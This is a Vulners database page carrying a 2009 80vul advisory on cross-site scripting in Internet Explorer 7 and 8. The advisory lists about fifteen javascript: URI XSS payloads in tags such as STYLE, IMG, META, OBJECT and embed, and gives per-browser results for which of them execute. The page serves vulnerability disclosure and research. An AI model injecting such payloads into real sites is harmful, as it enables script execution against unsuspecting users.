Vulners
Lucene search
Internet Explorer 7/8 Cross Site Scripting
`Multiple Exploiting IE8/IE7 XSS Vulnerability
Author: www.80vul.com [Email:5up3rh3i#gmail.com]
Release Date: 2009/06/22
References: http://www.80vul.com/ie8/Multiple%20Exploiting%20IE8IE7%20XSS%20Vulnerability.txt
Overview:
Tags[not include <IFRAME>] in ie7/8 are don't allowe to run
"javascript:[jscodz]",but
we found them allowed ro run where open it in new target.
like this url:
http://www.80vul.com/test/ie8-1.htm
ie8-1.htm's codz :
<STYLE>@import 'javascript:alert("xss1")';</STYLE>
<IMG SRC=javascript:alert('XSS2')>
<BODY BACKGROUND="javascript:alert('XSS3')">
<LINK REL="stylesheet" HREF="javascript:alert('XSS4');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS5');">
<IFRAME SRC="javascript:alert('XSS6');"></IFRAME>
<DIV STYLE="background-image: url(javascript:alert('XSS7'))">
<STYLE>.XSS{background-image:url("javascript:alert('XSS8')");}</STYLE><A
CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS9')")}</STYLE>
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param
name=url value=javascript:alert('XSS10')></OBJECT>
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
<script SRC="javascript:alert('xss11');"></script>
<video SRC="javascript:alert('xss12');"</video>
<LAYER SRC="javascript:alert('xss13')"></LAYER>
<embed src="javascript:alert('xss14')"
type="application/x-shockwave-flash" allowscriptaccess="always"
width="0" height="0"></embed>
<applet src="javascript:alert('xss15')" type=text/html>
when visite this url by ie7/8, <IFRAME
SRC="javascript:alert('XSS6');"></IFRAME> this is runing, but other
aren't to run.
but, where open ie8-1.htm in new target[like this :<a href=
target="_blank"> and <iframe> and window.open in <sript> ... etc.] ,so
test this codz in my localhost:
<a href="http://www.80vul.com/test/ie8-1.htm" target="_blank">go</a>
[PS: <a href="http://www.80vul.com/test/ie8-1.htm">go</a> don't work]
of couse this codz:
<iframe src="http://www.80vul.com/test/ie8s.htm"></iframe>
and this codz:
<script>window.open("http://www.80vul.com/test/ie8-1.htm");</script>
........[testing].......
So the results is :
---------------------------------------------------------
IE | alert
---------------------------------------------------------
ie7: xss4/xss3/xss2/xss1/xss8/xss/xss11/xss7/xss6/xss9
------------------------------------------------------
ie8: xss4/xss1/xss11/xss6
---------------------------------------------------------
Disclosure Timeline:
2009/05/01 - Found this Vulnerability
2009/06/22 - Public Disclosure
Greeting:
ycosxhack[http://hi.baidu.com/ycosxhack],Not his test,not this Vulnerability.
--
hitest
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
23 Jun 2009 00:00Current
7.4High risk
Vulners AI Score7.4